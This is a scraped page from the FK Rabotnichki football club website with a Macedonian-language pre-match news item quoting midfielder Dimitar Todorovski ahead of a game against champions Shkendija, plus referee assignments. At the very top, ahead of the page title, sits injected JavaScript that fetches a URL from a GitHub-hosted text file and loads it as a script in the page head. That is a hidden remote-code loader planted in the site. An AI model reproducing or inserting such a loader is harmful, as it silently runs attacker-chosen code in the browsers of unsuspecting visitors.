;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Тодоровски: Секогаш е мотив да се надигра шампионот
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Тодоровски: Секогаш е мотив да се надигра шампионот

Работнички утре (13 часот) на арената „Тодор Проески“ ќе го пречека тимот на Шкендија, кој во минатото коло ја прослави шампионската титула. Фудбалерот за врска Димитар Тодоровски вели дека тој и соиграчите имаат големи мотиви да се надигруваат со најдобриот тим во шампионатот.

„Секогаш е мотив да се надигра шампионот. Ќе го дадеме максимумот за да забележиме позитивен резултат и да се вратиме на вистински колосек по поразот од Шкупи. Верувам дека можеме да оствариме успех доколку ги исполниме поставените задачи од шефот на стручниот штаб Александар Влахо. Шкендија е квалитетен тим со одлични поединци, но се надевам дека со добра игра ќе успееме да ја реализираме нашата цел“, вели Тодоровски.

Главен судија на утрешниот натпревар ќе биде Александар Грујоски, а ќе му помагаат Куштрим Лика и Зоран Јанкуловски. Четврти судија е Марјан Стојановски (сите од Кичево).

За делегат на натпреварот е одреден Кочо Зердески (Кичево), а контролор на судењето ќе биде Златко Неделкоски (Скопје).